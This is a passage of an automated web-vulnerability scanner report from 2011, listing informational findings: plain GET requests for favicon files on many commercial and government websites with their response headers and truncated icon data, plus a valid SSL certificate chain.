Set-Cookie: JSESSIONID=0E96D1F42FF3550AE37BF16CECFBB552; Path=/
ETag: W/"9662-1285960496000"
Last-Modified: Fri, 01 Oct 2010 19:14:56 GMT
Content-Language: en-US
Content-Length: 9662
Date: Sat, 02 Apr 2011 12:43:27 GMT

......00.... ..%......(...0...`..... ......%.........................................E..................................................................................................................
...[SNIP]...
28.8. http://www.dailymail.co.uk/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dailymail.co.uk
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dailymail.co.uk
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"7142-1296734424000"
Last-Modified: Thu, 03 Feb 2011 12:00:24 GMT
Content-Length: 7142
Date: Sat, 02 Apr 2011 13:43:53 GMT
Connection: close

..............(...F...........h...n... .... ............... .h...~...(....... .........................................................................................................................
...[SNIP]...
28.9. http://www.dominos.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dominos.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dominos.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"1718-1282908538000"
Last-Modified: Fri, 27 Aug 2010 11:28:58 GMT
Content-Length: 1718
Date: Sat, 02 Apr 2011 13:53:49 GMT

..............(...&...........h...N...(....... .........................................................................................................................................wx..`....w..l...
...[SNIP]...
28.10. http://www.gap.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gap.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gap.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=21600,post-check=21600,pre-check=21600
Accept-Ranges: bytes
ETag: W/"2958-1299723520000"
Last-Modified: Thu, 10 Mar 2011 02:18:40 GMT
Content-Length: 2958
Date: Sat, 02 Apr 2011 13:31:28 GMT
Connection: close

..............................x...f...........x...............8...V...........................x...............x...............8............. .h...6......... .H....................    ..........x...f
....
...[SNIP]...
28.11. http://www.hi5.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hi5.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hi5.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"5430-1286911046000"
Last-Modified: Tue, 12 Oct 2010 19:17:26 GMT
Content-Length: 5430
Date: Sat, 02 Apr 2011 13:34:01 GMT
Set-Cookie: NSC_bqq-tfswfst-ofxvj=e246bf123660;expires=Sat, 02-Apr-11 14:16:46 GMT;path=/

...... .... .....&......... .h.......(... ...@..... ...................................................................................................................................................
...[SNIP]...
28.12. http://www.hotwire.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotwire.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hotwire.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"2238-1300925673000"
Last-Modified: Thu, 24 Mar 2011 00:14:33 GMT
Content-Length: 2238
Date: Sat, 02 Apr 2011 13:37:49 GMT
Set-Cookie: NSC_qspe-xxx-qfstjtu=ffffffffaf131c3145525d5f4f58455e445a4a422d69;path=/;httponly

...... ..............(... ...@.......................................km..........RU......JI..)(........................................................................................................
...[SNIP]...
28.13. http://www.instructables.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.instructables.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.instructables.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Resin/3.0.28
P3P: IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA
ETag: "DV9F16DWc0+"
Last-Modified: Sat, 15 Jan 2011 00:26:28 GMT
Content-Length: 894
X-Cacheable: YES - 7 days
Cache-Control: max-age=604800
Date: Sat, 02 Apr 2011 13:36:02 GMT
X-Varnish: 4054888766 4042462506
Age: 90552
Via: 1.1 varnish
X-Cache-Svr: squid02.instructables.com
X-Cache: HIT
X-Cache-Hits: 352086

..............h.......(....... .................................................................................................................................................x.....~..t..............
...[SNIP]...
28.14. http://www.jstor.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jstor.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jstor.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: TENACIOUS=R2998840958; path=/
Server: AtyponWS/7.2
ETag: "7KI7zr14ieD"
Last-Modified: Fri, 25 Jun 2010 18:23:24 GMT
Content-Length: 1150
Date: Sat, 02 Apr 2011 14:05:26 GMT

............ .h.......(....... ..... .................................................................................................]W..]W..]W..]W..]W..]W..]W..]W..]W..]W..]W..]W..................]W
...[SNIP]...
28.15. http://www.medcohealth.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.medcohealth.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.medcohealth.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Pragma: no-cache

<html><head><title>Request Rejected</title></head><body>The requested URL was rejected. Please consult with your administrator.<br><br>Your support ID is: 6984906241309083367</body></html>
28.16. http://www.mynewplace.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mynewplace.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mynewplace.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Resin/3.1.7a
P3P: policyref="/w3c/p3p.xml", CP="CURa DEVa TAIa CONo OUR IND DSP CAO COR"
ETag: "82870KToCgf"
Last-Modified: Wed, 30 Mar 2011 18:45:34 GMT
Accept-Ranges: bytes
Content-Length: 1150
Date: Sat, 02 Apr 2011 13:57:13 GMT
Set-Cookie: BIGipServerWEB_APPS_SE=2533425674.37663.0000; path=/
Vary: Accept-Encoding, User-Agent

............ .h.......(....... ..... ...........................................v...............................................................w...........s...e...n...V...............................
...[SNIP]...
28.17. http://www.officedepot.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.officedepot.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.officedepot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Length: 3978
Cache-Control: no-cache
Expires: Sat, 02 Apr 2011 13:39:10 GMT
Date: Sat, 02 Apr 2011 13:39:10 GMT
Connection: close
Set-Cookie: cae_browser=desktop; path=/; domain=.officedepot.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html class="nojs" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="expires" content="0">
...[SNIP]...
28.18. http://www.outbrain.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outbrain.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.outbrain.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"1150-1301587216000"
Last-Modified: Thu, 31 Mar 2011 16:00:16 GMT
Content-Length: 1150
Date: Sat, 02 Apr 2011 13:42:38 GMT

............ .h.......(....... ..... ..........................................h.+.h...h...h...h...h...h...h. .............................j...j...j..O..........E....j...j...j...................m...m
...[SNIP]...
28.19. http://www.pogo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pogo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Age: 89748
Date: Fri, 01 Apr 2011 12:39:29 GMT
Connection: Keep-Alive
Via: POGO-EDGE
ETag: W/"766-1118367449000"
Last-Modified: Fri, 10 Jun 2005 01:37:29 GMT
Content-Length: 766
Server: Apache-Coyote/1.1

...... ..............(... ...@.........................................................................................................................................................................
...[SNIP]...
28.20. http://www.retrevo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.retrevo.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.retrevo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
ETag: W/"3638-1170459929000"
Last-Modified: Fri, 02 Feb 2007 23:45:29 GMT
Content-Length: 3638
Date: Sat, 02 Apr 2011 13:38:22 GMT
Server: Apache-Coyote/1.1
Connection: close

...... ..........&...........h.......(... ...@.......................................ok..b]..........72..*#..*$..,%..-'..|x..........*$..*#..*#..+%..,&..zv..*#..+$..,&..GB..zv......_Z..+%......*#..*$
...[SNIP]...
28.21. http://www.rightathome.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rightathome.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rightathome.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 NOT FOUND
Cache-Control: private,max-age=0
Content-Length: 611
Server: Microsoft-IIS/7.0
Exires: Fri, 18 Mar 2011 14:14:07 GMT
Public-Extension: http://schemas.microsoft.com/repl-2
X-Powered-By: ASP.NET
MicrosoftSharePointTeamServices: 12.0.0.6421
Date: Sat, 02 Apr 2011 14:14:06 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
   <title></title>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta http-equiv="Expires" content="0" />
...[SNIP]...
28.22. http://www.savings.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.savings.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.savings.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Resin/3.1.8
ETag: "FEdr0ApeDYw"
Last-Modified: Fri, 01 Apr 2011 13:49:28 GMT
Accept-Ranges: bytes
Content-Length: 1150
X-N: S
Date: Sat, 02 Apr 2011 14:00:54 GMT
Connection: close

............ .h.......(....... ..... .................................................................................................................................@@................................
...[SNIP]...
28.23. http://www.shopzilla.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopzilla.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shopzilla.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"894-1299516992000"
Last-Modified: Mon, 07 Mar 2011 16:56:32 GMT
Content-Length: 894
Date: Sat, 02 Apr 2011 13:26:19 GMT

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...
28.24. http://www.techbargains.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.techbargains.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.techbargains.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=604800
Content-Length: 1406
Date: Sat, 02 Apr 2011 14:02:50 GMT
Last-Modified: Mon, 21 Mar 2011 11:39:06 GMT
Server: Apache-Coyote/1.1

..............h.......(....... ...........@...........................t.......5...Q...+3....F...8A..{{......................+.........................................................................
...[SNIP]...
28.25. http://www.tracfone.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tracfone.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tracfone.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: TFWirelessA=R2837728125; path=/; expires=Sat, 02-Apr-2011 14:03:25 GMT
Date: Sat, 02 Apr 2011 13:33:18 GMT
Accept-Ranges: bytes
Content-Length: 1078
Last-Modified: Wed, 04 Mar 2009 22:02:34 GMT
x-wily-servlet: Clear appServerIp=10.248.45.11&agentName=TRAC&servletName=FileServlet&servletResponseTime=0&agentHost=dp-web1&agentProcess=WebLogic
X-Powered-By: Servlet/2.5 JSP/2.1
x-wily-info: Clear guid=166AF1570AF82D0B01733919685DAB4D

...... ..........&...........(.......(... ...@.................................................................................................fffff...........fffff.........fff....fh.......fff....fh.
...[SNIP]...
28.26. http://www.va.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.va.gov
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.va.gov
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Pragma: no-cache

<html><head><title>Request Rejected</title></head><body>The requested URL was rejected. <br><br>Please contact the VA Network and Security Operations Center at 1-800-877-4328 or email VANSOC@va.gov, i
...[SNIP]...
28.27. http://www.webs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webs.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.webs.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: FW_PIN_HASH=R728070988; path=/
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"1406-1296536635000"
Last-Modified: Tue, 01 Feb 2011 05:03:55 GMT
Content-Length: 1406
Date: Sat, 02 Apr 2011 13:31:25 GMT

..............h.......(....... .................................#.JLk...............,..A.SSe.....@.7...... .A).. . .:\K. ." .,...'...<&L.+.,.....$6......&C&...........!..........'.."...l... "....
...[SNIP]...
28.28. http://www.zappos.com/favicon.ico  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zappos.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.zappos.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.9.4
Last-Modified: Wed, 23 Mar 2011 20:13:27 GMT
Content-Length: 1406
X-Core-Value: 8. Do More With Less
X-Recruiting: If you're reading this, maybe you should be working at Zappos instead. Check out jobs.zappos.com
X-UUID: 71b321ba-56d5-11e0-ac21-001a645b7cf4
Cache-Control: max-age=1894551
Date: Sat, 02 Apr 2011 13:31:01 GMT
Connection: close

..............h.......(....... ...........@.............................W.....z\C...........t..nM..............{f..........wR..eH...h..........t\.......x...........}..{Z...l..}b..........sV..rO...^..`
...[SNIP]...
29. SSL certificate  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://activresa-secure2.icor.fr
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  activresa-secure2.icor.fr
Issued by:  Thawte SSL CA
Valid from:  Wed Sep 29 19:00:00 CDT 2010
Valid to:  Sun Oct 30 18:59:59 CDT 2011

Certificate chain #1

Issued to:  Thawte SSL CA
Issued by:  thawte Primary Root CA
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  thawte Primary Root CA
Issued by:  Thawte Premium Server CA
Valid from:  Thu Nov 16 18:00:00 CST 2006
Valid to:  Wed Dec 30 17:59:59 CST 2020

Certificate chain #3

Issued to:  Thawte Premium Server CA
Issued by:  Thawte Premium Server CA
Valid from:  Wed Jul 31 19:00:00 CDT 1996
Valid to:  Fri Jan 01 17:59:59 CST 2021
Report generated by XSS.CX at Sat Apr 02 09:55:17 CDT 2011.